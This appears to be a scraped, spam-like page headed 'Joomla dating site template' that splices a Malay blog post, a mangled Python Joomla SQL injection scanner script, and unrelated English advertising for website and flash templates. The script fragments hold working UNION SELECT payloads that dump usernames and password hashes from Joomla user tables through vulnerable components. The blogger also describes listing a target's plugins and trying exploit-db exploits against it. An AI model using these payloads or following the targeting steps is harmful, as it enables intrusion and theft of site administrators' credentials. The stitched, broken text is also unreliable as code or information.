Joomla dating site template

07 Apr

Ini adalah python script, dalam script ni dah list POC Exploit bagi kelemahan SQLi, kita leh tambah entry untuk kelemahan-kelemahan baru. Script ni bukan aku buat, aku download dari internet. Nanti insya allah ada masa, aku akan cuba buat satu tool untuk tujuan ni. /usr/bin/python import sys,os, re, urllib2, socket ,string if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': Sys Cls = 'clear' elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos': Sys Cls = 'cls' else: Sys Cls = 'unknown' os.system(Sys Cls) print "\n|---------------------------------------------------------------|" print "| beenudel1986[@]gmail[dot]com |" print "| Joomla Sql Injection Scanner 3.0 |" print "| 11/2008 |" print "| Do Visit Ok analogi dia macam ni, seorang tukang ukir yang hebat, masih memerlukan pahat dan penukul untuk membuat ukiran. Bila kita sebut pasal Joomla, stigma sesetengah pihak beranggapan ooh Joomla senang kena hack. Found out to be solution yang dia bagi pun sama jer, mudah jer kena hack 🙂 Jadi benda ni adalah subjektif. Basically core CMS Joomla adalah secure, punca digodam adalah sebab penggunaan components dan modules yang tidak secure, ini kebiasaannya yang berlaku. Aku banyak berjumpa dengan vendor yang condemn Joomla 100%, katanya senang kena hack, dan dia proposed solution dia.Beenu & darkc0|" print "| Total: 123 Vulns |" print "|---------------------------------------------------------------|\n" if len(sys.argv) UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM " pre "_users WHERE usertype=0x53757065722041646d696e6973747261746f72--", "index.php?option=com_mad4joomla&jid=-2 union select 1,concat(username,char(58),password)KHG,3,4 from " pre "_users--", "index.php?

Individual approach to each client - the main idea of our business. With our web site templates you can get a professional web design at an extremely low price, and at the same time save a lot of time as the base design of your future site is already finished. Web site template is ready designed html web site which are prepared so it is easy to insert your personal content. Visit our free templates section and get your free template today!

That is why we offer great customer support, free installation service, free web hosting from our partners and more... We offer ready made website design templates also called web site templates and flash templates.

Hasil yang diperolehi adalah senarai plugins/components yang diinstal pada target joomla kita.

Dari senarai ni, kita leh cross check dengan exploit-db, kalau-kalau ada POC exploit code dan kita boleh la try exploit.

Easy Flash Template differs from regular flash template in structure.

Our Easy Flash Templates allow you to edit your text, button labels, email form, background music, and pictures in Notepad or any other text editor, so absolutely no Flash experience nor a copy of Flash is required, as all the content of the easy flash template is stored in the external TXT file, which can be easily edited in any text or HTML editor. So you can simply write your e-mail address in the file which is in the template's package and your contact form is ready to go.

option=com_jabode&task=sign&sign=taurus&id=-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,password) FROM " pre "_users--", "index.php?

option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM " pre "_users--", "index.php?